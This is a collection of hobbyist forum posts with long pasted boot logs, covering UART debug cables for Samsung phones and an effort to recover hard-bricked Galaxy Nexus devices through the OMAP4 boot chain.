<6>zram: num_devices not specified. Using default: 1
<6>zram: Creating 1 devices ...
<6>WM8994 Audio Codec 0.1
wm8994_extensions: initializing driver v10
<6>s3c_idma_preallocate_buffer: VA-f00c0000 PA-C0000000 163840bytes
<6>asoc: WM8994 PAIFRX <-> samsung-i2s.0 mapping ok
<6>ALSA device list:
<6> #0: smdkc110
<6>oprofile: using arm/armv7
<6>GACT probability NOT on
<6>Mirror/redirect action on
<6>u32 classifier
<6> Actions configured
<6>Netfilter messages via NETLINK v0.30.
<6>nf_conntrack version 0.5.0 (4257 buckets, 17028 max)
<6>ctnetlink v0.93: registering with nfnetlink.
<6>NF_TPROXY: Transparent proxy support initialized, version 4.1.0
<6>NF_TPROXY: Copyright (c) 2006-2007 BalaBit IT Ltd.
<6>xt_time: kernel timezone is -0000
<6>ip_tables: (C) 2000-2006 Netfilter Core Team
<6>arp_tables: (C) 2002 David S. Miller
<6>TCP cubic registered
<6>NET: Registered protocol family 10
<6>mmc0: new high speed MMC card at address 0001
<6>Mobile IPv6
<6>ip6_tables: (C) 2000-2006 Netfilter Core Team
<6>mmcblk0: mmc0:0001 M2G1DD 1.91 GiB
<6>IPv6 over IPv4 tunneling driver
<6> mmcblk0: p1 p2 p3
<6>NET: Registered protocol family 17
<6>NET: Registered protocol family 15
<6>Bluetooth: RFCOMM TTY layer initialized
<6>Bluetooth: RFCOMM socket layer initialized
<6>Bluetooth: RFCOMM ver 1.11
<6>Bluetooth: BNEP (Ethernet Emulation) ver 1.3
<6>Bluetooth: HIDP (Human Interface Emulation) ver 1.2
<6>NET: Registered protocol family 35
<6>VFP support v0.3: implementor 41 architecture 3 part 30 variant c rev 2
<6>ThumbEE CPU extension supported.
<6>s5pv210_cpufreq_init: S5PV210 cpu-freq driver
<6>regulator_init_complete: pd_mfc_supply: disabling
<6>regulator_init_complete: pd_tv_supply: disabling
<6>regulator_init_complete: pd_cam_supply: disabling
## wifi_probe
wifi_set_power = 1
wifi_set_carddetect = 1
<4>mmc1: queuing unknown CIS tuple 0x80 (50 bytes)
<4>mmc1: queuing unknown CIS tuple 0x80 (7 bytes)
<4>mmc1: queuing unknown CIS tuple 0x80 (3 bytes)
<6>mmc1: new SDIO card at address 0001
F1 signature read @0x18000000=0x9934329
DHD: dongle ram size is set to 294912(orig 294912)
wl_create_event_handler thr:3d started
dhd_attach thr:3e started
dhd_attach thr:3f started
dhd_attach thr:40 started
Broadcom Dongle Host Driver: register interface [wlan0] MAC: 00:90:4c:11:22:33
Dongle Host Driver, version 5.90.195.104
Compiled in drivers/net/wireless/bcmdhd on Nov 5 2013 at 22:34:41
wifi_set_power = 0
=========== WLAN placed in RESET ========
<6>s3c-rtc s3c2410-rtc: rtc disabled, re-enabling
<6>s3c-rtc s3c2410-rtc: setting system clock to 2010-12-31 23:07:37 UTC (1293836857)
<6>FIMC0 registered successfully
<6>FIMC1 registered successfully
<6>FIMC2 registered successfully
<6>S5P TVOUT Driver, (c) 2010 Samsung Electronics
<4>clk_get: could not find clock mout_vpll_src for dev s5p_device_tvout+0x8/0xd8 (s5p-tvout)
<3>failed to find clock "mout_vpll_src"
<6>s5p-tvout s5p-tvout: hpd status: cable removed/not connected
<6>s5p_tv_probe TV Probing is done
<6>max8998_charger_probe : MAX8998 Charger Driver Loading
<6>max8998_charger_probe : pmic interrupt registered
<6>check_lpm_charging_mode : lpm_charging_mode(0)
<6>wake enabled for irq 39
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 6 discharging_time : 0
discharging reason : 0
<7>max8998_charging_control : USB charging enabled
<6>max8998_set_cable : status(1)
<7>max8998_charging_control : USB charging enabled
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 6 discharging_time : 21606
discharging reason : 0
<4>Warning: unable to open an initial console.
<7>init_post begin
<6>Freeing init memory: 6204K
<7>max8998_charging_control : USB charging enabled
OHAI, stage1 init starting
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 6 discharging_time : 21606
discharging reason : 0
<7>max8998_charging_control : USB charging enabled
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 56 discharging_time : 21606
discharging reason : 0
<7>max8998_charging_control : USB charging enabled
<3>bio too big device loop0 (2 > 0)
<3>EXT4-fs (loop0): unable to read superblock
<6>EXT4-fs (loop1): mounted filesystem with ordered data mode. Opts: (null)
<7>s3c_bat_discharge_reason : Current charge level : 50%
Current time : 80 discharging_time : 21606
discharging reason : 0
<7>max8998_charging_control : USB charging enabled
stage1 log:
Fri Dec 31 23:07:37 GMT 2010
Creating filesystem with parameters:
Size: 18874368
Block size: 4096
Blocks per group: 32768
Inodes per group: 1152
Inode size: 256
Journal blocks: 1024
Label:
Blocks: 4608
Block groups: 1
Reserved block group size: 7
Created filesystem with 11/1152 inodes and 1110/4608 blocks
Creating filesystem with parameters:
Size: 419430400
Block size: 4096
Blocks per group: 32768
Inodes per group: 6400
Inode size: 256
Journal blocks: 1600
Label:
Blocks: 102400
Block groups: 4
Reserved block group size: 31
Created filesystem with 11/25600 inodes and 3310/102400 blocks
force_recovery: 1
losetup: /dev/loop0: No such file or directory
mount: mounting /dev/loop0 on /system failed: Invalid argument
umount: can't umount /system: Invalid argument
losetup: /dev/loop2: No such device or address
losetup: /dev/loop0: No such device or address
5708 blocks
Fri Dec 31 23:09:02 GMT 2010
<3>init: cannot open '/initlogo.rle'
.
.
.
Taken from XXLA1 with zImage only... cm-10.1-wave-v2.1...
Interesting to see this...
Code:
<6>Memory: 69MB 214MB 0MB = 283MB total
<5>Memory: 272496k/325052k available, 17988k reserved, 0K highmem
<5>Virtual kernel memory layout:
vector : 0xffff0000 - 0xffff1000 ( 4 kB)
fixmap : 0xfff00000 - 0xfffe0000 ( 896 kB)
DMA : 0xff000000 - 0xffe00000 ( 14 MB)
vmalloc : 0xf0000000 - 0xfc000000 ( 192 MB)
lowmem : 0xc0000000 - 0xeff00000 ( 767 MB)
modules : 0xbf000000 - 0xc0000000 ( 16 MB)
.init : 0xc0008000 - 0xc0617000 (6204 kB)
.text : 0xc0617000 - 0xc0ce8000 (6980 kB)
.data : 0xc0ce8000 - 0xc0d34880 ( 307 kB)
.bss : 0xc0d348a4 - 0xc0e76ad8 (1289 kB)
Best Regards
This is my solution for now... with S8500. Tested by me.
In theory should work with S8530 too...
Later I will move to cable solution with Micro USB + Resistor...
Then hopefully this is working also with S8600 and S5250 for instance...
Best Regards
http://forum.xda-developers.com/showpost.php?p=41670635&postcount=5
In this FPM Mode... I can use AT Commands via UART...
So for now I can read and write something via UART...
Later more...
Best Regards
Made today few stupid mistakes....
510 R instead K...
Then confuse Pin 4 and 5 ...
I have 510 KOHM, but nothing happens...
Maybe not correct enough...
http://forum.xda-developers.com/showthread.php?t=820275
Code:
RID_FM_BOOT_ON_UART, /* 1 1 1 0 1 [B]619K[/B] Factory Mode Boot ON-UART */
I have used 620 KOHM with S8500 and S8600...
Factory Test Mode start ... this thingie with blue then green Screen... but nothing UART out nor input...
Maybe my wires wrong...
Will buy more Resistors...
Best Regards
Edit 1.
No idea yet, where is my mistake...
http://www.droidforums.net/forum/dr...own-motorola-factory-cable-4.html#post2234017
Backside Pinout...
I have now 510 KOHM + 13 KOHM = 523 KOHM...
Flashed to XXJEB to be sure...
Edit 2.
Check up...
My USB converter is alive...
Pin 4 and 5 should be correct, because Resistor Values working...
Will change Pin 2 and 3...
My fault...
For S8530 and S8500 now working.
Code:
[PAM: ] OneNAND physical base address : 0xb0000000
[PAM: ] OneNAND virtual base address : 0xb0000000
[PAM: ] FSR_PAM_InitNANDController Success!!
[PAM: ] --FSR_PAM_Init
bl3_info_block 1 age = 17
bl3_info_block 2 age = 18
BL3_2 Loading
+-------------------------------+
| Bootloader Shadowing FINISHED |
+-------------------------------+
Launch Image at 0x42080000
[BOOT_V1.0 (Jan 5 2012, 19:05:00)]
SelectBootingMode: H/W...0x3.
[BOOT] ARMCLK: 400000 KHz, MSYSHCLK 200000 KHz,MSYSPCLK: 100000 KHz, [BOOT] DSYSHCLK 166750 KHz,DSYSPCLK: 83375 KHz,PSYSHCLK: 133400 KHz, PSYSPCLK: 66700 KHz,SYSCON_A2M: 200000 KHz
Flash_Unlock failed
Poweron status - 20
FSA9480 0x03 Register = 1
FSA9480 0x0A Register = 0
FSA9480 0x0B Register = 8
FSA9480 0x07 Register = 1c
SelectBootingMode: Boot Mode = 1...
+++FIMD_Drv_INITIALIZE
FIMD_Drv_ChangeMode: MDNIE_MODE
Frame Rate:62 SCLK_FIMD:133400 kHz ClkDiv:4
---FIMD_Drv_INITIALIZE
---FIMD_Drv_SetWinOnOff(WIN4:1)
LCD initialize Finished
Display_LSI_Boot : disp_Main_Clean
Display_LSI_Boot : disp_Main_Clean_All
Display_LSI_Boot : disp_dimming_backlight
Display_LSI_Boot : disp_Normal_Init
DRV_modem_reset!!!!!!!!!!!!!!!!!
DRV_Send_DBL!!!!!!!!!!!!!!!!!
[DLOAD] Download Completed !!!
DRV_Wait_ModemInit!!!!!!!!!!!!!!!!!
DRV_CopyQSCBootBinary!!!!!!!!!!!!!!!!!
DRV_Send_BootBinaryCopyComplete!!!!!!!!!!!!!!!!!
DRV_Modem_BootingStart retry count = 0.
AST_POWERON
get_usb_sw_nv 0x40000
USBSwitch : AP
get_uart_sw_nv 0x40000
UARTSwitch : AP
My S8530 first UART output... with cable.
On XXKK5 with S8600 no luck... will try older Firmware...
Best Regards
Edit 1.
S8000 Jet
Code:
USBSwitch : AP
[BB31] VDD INT 1.2V
[BB31] VDD ARM 1.325V
ARM Clock: 400MHz --> 800MHz
[BOOT][DBG] RST_STAT 0x7E00_F904 : 0x00000001
[BOOT] ARMCLK: 800000, MPLL: 194000, HCLKX2: 266666, HCLK: 133333, PCLK: 33333
BootHWCheck: 6...
SelectBootingMode: H/W...0x6.
Poweron status - 10
pPowerOn 0 = 0xB00717E3
pPowerOn 1 = 0x0
pPowerOn 2 = 0x0
pPowerOn 3 = 0x10
pPowerOn 4 = 0x0
pPowerOn 5 = 0x0
pPowerOn 6 = 0x0
pPowerOn 7 = 0x0
pPowerOn 8 = 0x0
pPowerOn 9 = 0x0
pPowerOn 10 = 0x0
pPowerOn 11 = 0x0
pPowerOn 12 = 0x6
pPowerOn 13 = 0x0
FSA9480 0x03 Register = 1
FSA9480 0x0A Register = 0
FSA9480 0x0B Register = 8
FSA9480 0x07 Register = 1C
SelectBootingMode: Boot Mode = 1...
================================
LCD Source CLK -> MPLL(194000)
================================
uClkVal = 0x7 , uClkDir = 0x1
========================================
uVidconReg = 0x1D4 , uClkVal = 0x7
========================================
DRV_modem_reset!!!!!!!!!!!!!!!!!
DRV_Send_DBL!!!!!!!!!!!!!!!!!
[DLOAD] Download Completed !!!
DRV_Wait_MSMInit!!!!!!!!!!!!!!!!!
DRV_CopyMSMBootBinary!!!!!!!!!!!!!!!!!
DRV_Send_BootBinaryCopyComplete!!!!!!!!!!!!!!!!!
Ownership Release 0x5DFFF800, 0x0
AST_POWERON
get_usb_sw_nv 0x0
USBSwitch : AP
get_uart_sw_nv 0x0
UARTSwitch : AP
Drv_TaskEntry Start
DRV_Device_Init...
DRV_Device_Init...: DRV_hwversion = 6.
FSA9480 device ID = 40
JIT UART OFF NU_PWM_FID_SET_GPIO_PWMTOUT ok
prox_sensor_init SUCCESS~~~~~~~~~~~
[BOOT][Err] LCD_DET set PULLDOWN .
[LCD] ESD interrupt enable
acc_sensor_init SUCCESS~~~~~~~~~~~
pif_TaskEntry Start
[MODEMIF_AP_Init] NU_Create_Task pif task success
Create TESTMODE_Queue
Create testmode_task
Create TMFIFO_Queue
Create TESTMODE_RPT_Timer
brcm_bluetooth_main: Start Bluetooth Thread by BootEntry
0002 000.082 0.001.00.00:0000 SYSTEM > MochaTask: OSAL created.
0003 000.084 0.001.00.00:0000 BOOTMGR > MochaTask: OSAL created.
0004 000.091 0.001.00.00:0000 BOOTMGR > MochaTask: UART, USB, and Bluetooth created.
usb_api_open
usb_api_open
0005 000.100 0.001.00.00:0000 SYSTEM > MochaTask: DiagMgr created.
0006 000.106 0.001.00.00:0000 BOOTMGR > MochaTask: DiagMgr created.
0007 000.112 0.001.00.00:0000 EXCEPTION > __MemAllocForDebugHeap: Allocate 1200Kbytes (file OEM\OemDevFIFO.c, line 106)
0008 000.122 0.001.00.00:0000 AGENT > [__SysSecureBootRegisterPktRcvCallback:SysSecureBootPacket.c] __SysSecureBootRegisterPktRcvCallback is called!
0009 000.136 0.001.-1.-1:0000 BOOTMGR > MochaTask: EventMgr created.
0010 000.144 0.001.-1.-1:0000 BOOTMGR > MochaTask: AvMedia created.
0011 000.148 0.001.-1.-1:0000 ALL > DevGetHomeDLFlag : Address(0x0f940000) flag(0x0000ffff)
0012 000.157 0.001.-1.-1:0000 BOOTMGR > MochaTask: Clock created.
0013 000.162 0.001.-1.-1:0000 BOOTMGR > MochaTask: LED created.
0014 000.168 0.001.-1.-1:0000 BOOTMGR > MochaTask: Flip created.
0015 000.174 0.001.-1.-1:0000 SYSTEM > MochaTask: Clock, LED, Flip created.
+SDHC_Open(Ch1)
[SDHC] SDHC(ch1) Operating Clock : 378906Hz
[DS] data_srvc_task() Enter
[DS] diag_srvc_task() Enter
Diag_TaskEntry Start
I9000 tested with success...
So my cable work now with diffferent Samsung handsets...
Accept S8600 ...
Tested also with XXKJ7...
Need few days. Then test with S5250 will follow...
http://forum.xda-developers.com/showthread.php?t=1901376
I9001 is little bit similar to S8600... maybe helpfull.
Also usefull about UART:
http://forum.xda-developers.com/showthread.php?t=1209288
http://forum.xda-developers.com/showthread.php?t=1629359
Best Regards
UART on S5250 work, but not much info... yet...
Code:
AST_POWERON
*MRDY: 1
,~Booting Completed
This is output, if DL Mode...
Code:
AST_DOWNLOAD
I can set UART Logging temporary...
More text...
Best Regards
Hey guys. I'm doing some work to figure out how to recover Galaxy Nexus devices which are hard-bricked.. ie.. they have a bad or no bootloader installed.
the boot sequence
1. IROM - the Internal ROM which cannot be rewritten on the device. This loads the XLoader.
2. XLoader/MLO - This completes the initialization of the processor and memory, and loads up the relatively huge U-Boot ( Samsung modified this and calls it SBL)
3. UBoot/SBL - This "Bootloader" is almost a complete operating system. The U-Boot initializes the screen, provides Odin mode, Fastboot Mode as well as loading the kernel/recovery and provides a UART debugging mode (Yet to be unlocked).
4. Kernel - Once we reach this point, it's all clear.. the kernel is linux which loads android and all sorts of other things.
The Problem
People are bricking their devices at stage 2 and 3 of this boot sequence... This leaves them unable to boot Fastboot or Odin. The device is 100% interchangable with a brick. These devices are ending up hard bricked.
The solution
We must come up with a way to undo the hard brick. Here are some things i'm looking at to use the native hardware to recover itself.
When you plug in the device (when off), you will immediately notice a Texas Instruments D010 device gets enumerated. This is a debug mode for the processor.
Code:
Bus 001 Device 023: ID 0451:d010 Texas Instruments, Inc.
We've started looking at some bootloader output here: http://forum.xda-developers.com/showthread.php?t=1461986
You can find information about the OMAP4 bootloaders here: http://omapedia.org/wiki/Bootloader_Project
Help
I need help locating drivers to initialize the 0451:d010 device and make it readable from within Linux or Windows.. Generally Linux is easier to find appropriate drivers.
I could use some help collecting more reading materials and resources.
I think together as a community we can take care of this problem.
I kinda forgot that thread, it got lost among rom/kernel threads. Thanks for the reminder.
sent from my i9250
Ok... so here's the most complete boot log I've been able to obtain from the device
Code:
[Thermal] OK to boot
Initialize runtime thermal monitoring ...done!
-- OMAP 00004460 (version 04460e11) PPA release 1.6.1 Hash 30639809--
Device type: HS, DEBUG OFF
CPFROM HAL API support integrated
THERMAL support integrated: Run Time + Boot time
HDCP support integrated
-- PROD PPA RC3.2.3 --
Reset reason = 00037ba2
PRM_RSTST = 00000002
PPA freed 2992 bytes
Texas Instruments X-Loader 1.41 (Nov 16 2011 - 16:28:45)
Starting OS Bootloader from MMC/SD1 ...
EXCEPTION : CM_CLKMODE_DPLL_ABE = 0x7
EXCEPTION : CM_IDLEST_DPLL_ABE = 0x1
EXCEPTION : CM_CLKSEL_DPLL_ABE = 0x804018
EXCEPTION : CM_CLKMODE_DPLL_CORE = 0xf
EXCEPTION : CM_IDLEST_DPLL_CORE = 0x1
EXCEPTION : CM_CLKSEL_DPLL_CORE = 0x7d05
EXCEPTION : CM_CLKMODE_DPLL_PER = 0x107
EXCEPTION : CM_IDLEST_DPLL_PER = 0x1
EXCEPTION : CM_CLKSEL_DPLL_PER = 0x1400
EXCEPTION : CM_CLKMODE_DPLL_MPU = 0x117
EXCEPTION : CM_IDLEST_DPLL_MPU = 0x1
EXCEPTION : CM_CLKSEL_DPLL_MPU = 0x807d07
CFG_LOADADDR = 0xa0208000
1st instruct = 0xEA000007
[ __omap_twl6030_init_vbat_cfg :49] SA_PHOENIX_START_CONDITION = 0x4a
[ __omap_twl6030_init_vbat_cfg :54] SA_PH_CFG_VBATLOWV = 0x80
[ __omap_twl6030_init_vbat_cfg :63] SA_PH_CFG_VBATLOWV = 0x80
[ __omap_twl6030_init_vbat_cfg :86] SA_BBSPOR_CFG = 0x78
====== VCELL : 381375, SOC : 49, nType : 5 ======
[Charger] nScaledVCELL : 381375000, nDesriedSOC, : 62, nMaxSOC : 82, nMinSOC : 42
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
[ __omap_usbacc_test_donwload_by_musb :280] nDeviceType : 0x5
[ omap_usbacc_get_reboot_reason :333] nJigStatus = 0x00000003
[ __sbl_board_hw_init_late :719] final reboot mode in cable = 0x40000
[ __sbl_board_hw_init_late :730] Wake up by TA / USB / JIG
* FB base addr = 0xbea70000!
* PANEL_S6E8AA0_ID_READ : 0x12, 0x8e, 0x9f.
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
dev : 5
[sbl_board_charger_init_post] : Succeed set model data : 0x78!!!!!
====== VCELL : 381500, SOC : 50, nType : 5 ======
[Charger] nScaledVCELL : 381500000, nDesriedSOC, : 62, nMaxSOC : 82, nMinSOC : 42
[ omap_power_get_reset_source :47] PRM_RSTST : 0x1
[ __omap_usbacc_test_donwload_by_musb :280] nDeviceType : 0x5
[ omap_usbacc_get_reboot_reason :333] nJigStatus = 0x00000003
[ __sbl_board_hw_init_late :719] final reboot mode in cable = 0x40000
[ __sbl_board_hw_init_late :730] Wake up by TA / USB / JIG
* FB base addr = 0xbea70000!
* PANEL_S6E8AA0_ID_READ : 0x12, 0x8e, 0x9f.
[ omap_power_get_reset_source :47] PRM_RSTST : 0x1
message.command =
message.status =
message.recovery =
<hit enter twice to activate fiq debugger>
[Thermal] OK to boot
Initialize runtime thermal monitoring ...done!
-- OMAP 00004460 (version 04460e11) PPA release 1.6.1 Hash 30639809--
Device type: HS, DEBUG OFF
CPFROM HAL API support integrated
THERMAL support integrated: Run Time + Boot time
HDCP support integrated
-- PROD PPA RC3.2.3 --
Reset reason = 0003fba2
PRM_RSTST = 00000002
PPA freed 2992 bytes
Texas Instruments X-Loader 1.41 (Nov 16 2011 - 16:28:45)
Starting OS Bootloader from MMC/SD1 ...
EXCEPTION : CM_CLKMODE_DPLL_ABE = 0x7
EXCEPTION : CM_IDLEST_DPLL_ABE = 0x1
EXCEPTION : CM_CLKSEL_DPLL_ABE = 0x804018
EXCEPTION : CM_CLKMODE_DPLL_CORE = 0xf
EXCEPTION : CM_IDLEST_DPLL_CORE = 0x1
EXCEPTION : CM_CLKSEL_DPLL_CORE = 0x7d05
EXCEPTION : CM_CLKMODE_DPLL_PER = 0x107
EXCEPTION : CM_IDLEST_DPLL_PER = 0x1
EXCEPTION : CM_CLKSEL_DPLL_PER = 0x1400
EXCEPTION : CM_CLKMODE_DPLL_MPU = 0x117
EXCEPTION : CM_IDLEST_DPLL_MPU = 0x1
EXCEPTION : CM_CLKSEL_DPLL_MPU = 0x807d07
CFG_LOADADDR = 0xa0208000
1st instruct = 0xEA000007
[ __omap_twl6030_init_vbat_cfg :49] SA_PHOENIX_START_CONDITION = 0x8
[ __omap_twl6030_init_vbat_cfg :54] SA_PH_CFG_VBATLOWV = 0x80
[ __omap_twl6030_init_vbat_cfg :63] SA_PH_CFG_VBATLOWV = 0x80
[ __omap_twl6030_init_vbat_cfg :86] SA_BBSPOR_CFG = 0x78
====== VCELL : 381375, SOC : 50, nType : 5 ======
[Charger] nScaledVCELL : 381375000, nDesriedSOC, : 62, nMaxSOC : 82, nMinSOC : 42
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
[ __omap_usbacc_test_donwload_by_musb :280] nDeviceType : 0x5
[ omap_usbacc_get_reboot_reason :333] nJigStatus = 0x00000003
[ __sbl_board_hw_init_late :719] final reboot mode in cable = 0x40000
[ __sbl_board_hw_init_late :730] Wake up by TA / USB / JIG
* FB base addr = 0xbea70000!
* PANEL_S6E8AA0_ID_READ : 0x12, 0x8e, 0x9f.
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
<hit enter twice to activate fiq debugger>
Communications established====== VCELL : 381375, SOC : 50, nType : 5 ======
[Charger] nScaledVCELL : 381375000, nDesriedSOC, : 62, nMaxSOC : 82, nMinSOC : 42
* FB base addr = 0xbea70000!
* PANEL_S6E8AA0_ID_READ : 0x12, 0x8e, 0x9f.
[ omap_power_get_reset_source :47] PRM_RSTST : 0x2
<hit enter twice to activate fiq debugger>
debug> console
console mode
[ 3.320373] cannot apply mgr(lcd) on inactive device
[ 3.325805] omapfb omapfb: failed to apply dispc config
[ 3.331359] cannot apply mgr(tv) on inactive device
[ 3.336578] omapfb omapfb: failed to apply dispc config
[ 3.341949] cannot apply mgr(lcd2) on inactive device
[ 3.347167] omapfb omapfb: failed to apply dispc config
[ 3.354888] regulator_init_complete: VDAC: disabling
[ 3.361053] omaplfb OMAPLFBInitFBDev: Device 0: Requesting 4 TILER 2D framebuffers
[ 3.369232] ## wifi_probe
[ 3.371917] wifi_set_power = 1
[ 3.631866] wifi_set_carddetect = 1
[ 3.647338]
[ 3.647338] Dongle Host Driver, version 5.90.125.94
[ 3.647338] Compiled in drivers/net/wireless/bcmdhd on Nov 21 2011 at 19:05:54
[ 3.764984] mmc1: queuing unknown CIS tuple 0x80 (7 bytes)
[ 3.817810] mmc1: queuing unknown CIS tuple 0x80 (3 bytes)
[ 3.837463] mmc1: new high speed SDIO card at address 0001
[ 3.844818] F1 signature read @0x18000000=0x16844330
[ 3.859436] DHD: dongle ram size is set to 294912(orig 294912)
[ 3.866546] wl_create_event_handler thr:5b started
[ 3.871673] dhd_attach thr:5c started
[ 3.875488] dhd_attach thr:5d started
[ 3.879272] dhd_attach thr:5e started
[ 3.883148] wifi_get_mac_addr
[ 3.888519] Broadcom Dongle Host Driver: register interface [wlan0] MAC: 00:90:4c:11:22:33
[ 3.897430] wifi_set_power = 0
[ 4.157012] =========== WLAN placed in RESET ========
[ 4.163116] fsa9480 4-0025: cable detect change, from 'unknown/none' to 'uart'
[ 4.171203] twl_rtc twl_rtc: setting system clock to 2012-05-13 00:25:12 UTC (1336868712)
[ 4.180816] Freeing init memory: 276K
[ 4.187561] init (1): /proc/1/oom_adj is deprecated, please use /proc/1/oom_score_adj instead.
[ 4.214172] max17040 4-0036: online = 1 vcell = 3795000 soc = 48 status = 3 health = 1 temp = 330 charger status = 0
[ 4.288116] keychord: using input dev tuna-gpio-keypad for fevent
[ 4.354614] EXT4-fs (mmcblk0p10): mounted filesystem with ordered data mode. Opts: (null)
[ 4.446746] mms_ts 3-0048: fw version 0x62 already present
[ 4.454498] mms_ts 3-0048: Melfas MMS-series touch controller initialized
[ 4.757202] omap-rproc omap-rproc.1: Loaded BIOS image ducati-m3.bin, size 4489868
[ 4.765838] omap-rproc omap-rproc.1: BIOS image version is 2
[ 4.785888] omap-iommu omap-iommu.0: iommu_get: ducati qos_request
[ 4.806243] omap_hwmod: ipu: failed to hardreset
[ 4.811035] omap-iommu omap-iommu.0: ducati: version 2.1
[ 4.822448] omap-rproc omap-rproc.1: remote processor ipu is now up
[ 4.835571] omap_rpmsg_mbox_callback: received echo reply from ipu !
[ 4.842071] omap_rpmsg_mbox_callback: received echo reply from ipu !
[ 4.848541] omap_rpmsg_mbox_callback: received echo reply from ipu !
[ 4.855072] omap_rpmsg_mbox_callback: received echo reply from ipu !
[ 4.861816] virtio_rpmsg_bus virtio0: creating channel rpmsg-client-sample addr 0x32
[ 4.869812] virtio_rpmsg_bus virtio0: creating channel rpmsg-client-sample addr 0x33
[ 4.877899] virtio_rpmsg_bus virtio0: creating channel rpmsg-omx addr 0x3c
[ 4.885192] rpmsg_omx rpmsg-omx0: new OMX connection srv channel: 1024 -> 60!
[ 5.959960] EXT4-fs (mmcblk0p12): recovery complete
[ 5.974639] EXT4-fs (mmcblk0p12): mounted filesystem with ordered data mode. Opts: nomblk_io_submit,errors=panic
[ 6.021484] virtio_rpmsg_bus virtio1: creating channel rpmsg-omx addr 0x3c
[ 6.029602] rpmsg_omx rpmsg-omx1: new OMX connection srv channel: 1024 -> 60!
[ 6.170227] EXT4-fs (mmcblk0p11): recovery complete
[ 6.178833] EXT4-fs (mmcblk0p11): mounted filesystem with ordered data mode. Opts: nomblk_io_submit,errors=panic
[ 6.199371] EXT4-fs (mmcblk0p3): mounted filesystem with ordered data mode. Opts: (null)
[ 6.269744] android_usb: already disabled
[ 6.274810] mtp_bind_config
[ 6.277740] adb_bind_config
[ 6.297790] HDCP: loaded keys
[ 6.481079] warning: `adbd' uses 32-bit capabilities (legacy support in use)
[ 6.488433] adb_open
[ 6.702026] init: sys_prop: permission denied uid:1001 name:net.rmnet1.dns1
[ 6.709808] init: sys_prop: permission denied uid:1001 name:net.rmnet1.dns2
[ 6.718780] init: sys_prop: permission denied uid:1001 name:net.rmnet1.gw
[ 6.726196] init: sys_prop: permission denied uid:1001 name:net.rmnet2.dns1
[ 6.733612] init: sys_prop: permission denied uid:1001 name:net.rmnet2.dns2
[ 6.741455] init: sys_prop: permission denied uid:1001 name:net.rmnet2.gw
[ 6.749481] PVR: Installing MISR with cookie c0800c2c
[ 6.757415] PVR: Installing device LISR SGX ISR on IRQ 53 with cookie c7aa2700
[ 6.766174] PVR: OSUnMapPhysToLin: unmapping 65535 bytes from c8be0000
[ 6.773162] PVR: SysFinalise: Version string: SGX revision = 1.2.0
[ 6.797027] [MODEM_IF] misc_open : umts_boot0
[ 6.801666] omap_hsi omap_hsi.0: HSI clock is now 96000000
[ 6.824066] omap_hsi omap_hsi.0: Entering RX wakeup in 3 wires mode (no CAWAKE)
[ 6.831634] [MODEM_IF] xmm6260_off()
[ 6.835327] [MODEM_IF] PA EVENT : reset =0, pa=1
[ 6.840057] [MODEM_IF] umts_ipc0 state changed: OFFLINE
[ 6.845367] [MODEM_IF] xmm6260_on()
[ 6.866821] SMC: SecureCRC=0xBC7458DC
[ 6.959045] [MODEM_IF] PA EVENT : reset =1, pa=0
[ 7.042053] SMC PA: INFO 00000001 00:00:00.000 ------ ------ --------------- Booting... (t=00:25:15.356) SMCXG01.04p11.32196 /Widevine Integration
[ 7.058532] SMC PA: INFO 00000002 00:00:00.017 ------ ------ --------------- Booted
[ 7.238128] [MODEM_IF] misc_release : umts_boot0
[ 7.245147] omap_hsi omap_hsi.0: hsi_write_cancel ch 0
[ 7.251708] omap_hsi omap_hsi.0: __hsi_write_cancel : -125
[ 7.258941] omap_hsi omap_hsi.0: hsi_read_cancel ch 0
[ 7.265106] omap_hsi omap_hsi.0: __hsi_read_cancel : -125
[ 7.270629] omap_hsi omap_hsi.0: __hsi_write_cancel : -61
[ 7.276794] omap_hsi omap_hsi.0: __hsi_read_cancel : -61
[ 7.282470] [MODEM_IF] misc_open : umts_boot1
[ 7.287506] omap_hsi omap_hsi.0: Entering RX wakeup in 4 wires mode
[ 8.299774] misc dsscomp: [c7234000] ignoring set failure -22
[ 8.530609] s6e8aa: d/b 1, p 1, b-01390ffb
[ 8.530639] s6e8aa: c0, 1, b-001215fb, got v 3534794, factory wants 3529338
[ 8.530670] s6e8aa: c1, 1, b-00478927, got v 3764175, factory wants 3755229
[ 8.530700] s6e8aa: c2, 1, b-0012a421, got v 3486385, factory wants 3481495
[ 8.530731] s6e8aa: d/b 1, p 2, b-044d7cf9
[ 8.530761] s6e8aa: c0, 2, b-00bc6c9a, got v 3336878, factory wants 3330014
[ 8.530761] s6e8aa: c1, 2, b-01688d4e, got v 3556595, factory wants 3547367
[ 8.530792] s6e8aa: c2, 2, b-00a7db92, got v 3293516, factory wants 3285750
[ 8.530822] s6e8aa: d/b 1, p 3, b-0b323808
[ 8.530853] s6e8aa: c0, 3, b-026395cd, got v 3203365, factory wants 3194725
[ 8.530883] s6e8aa: c1, 3, b-0331a9fb, got v 3435905, factory wants 3424659
[ 8.530914] s6e8aa: c2, 3, b-021e3100, got v 3149091, factory wants 3139262
[ 8.530944] s6e8aa: d/b 1, p 4, b-186611f4
[ 8.530944] s6e8aa: c0, 4, b-062b8517, got v 3065435, factory wants 3053644
[ 8.531036] s6e8aa: c1, 4, b-0725b7f8, got v 3297279, factory wants 3284148
[ 8.531249] s6e8aa: c2, 4, b-053f8b4b, got v 3005194, factory wants 2992315
[ 8.531280] s6e8aa: d/b 1, p 5, b-6840e4ff
[ 8.531311] s6e8aa: c0, 5, b-221c3d41, got v 2688265, factory wants 2667329
[ 8.531341] s6e8aa: c1, 5, b-24fd4a51, got v 2906316, factory wants 2884895
[ 8.531372] s6e8aa: c2, 5, b-1d67176e, got v 2594260, factory wants 2571400
[ 8.531402] s6e8aa: d/b 1, p 6, b-ffffffff
[ 8.531433] s6e8aa: c0, 6, b-59b1b4d2, got v 2325286, factory wants 2292333
[ 8.531463] s6e8aa: c1, 6, b-60d28a3e, got v 2534439, factory wants 2499333
[ 8.531463] s6e8aa: c2, 6, b-4efd2a80, got v 2197307, factory wants 2162000
[ 11.727386] [MODEM_IF] misc_release : umts_boot1
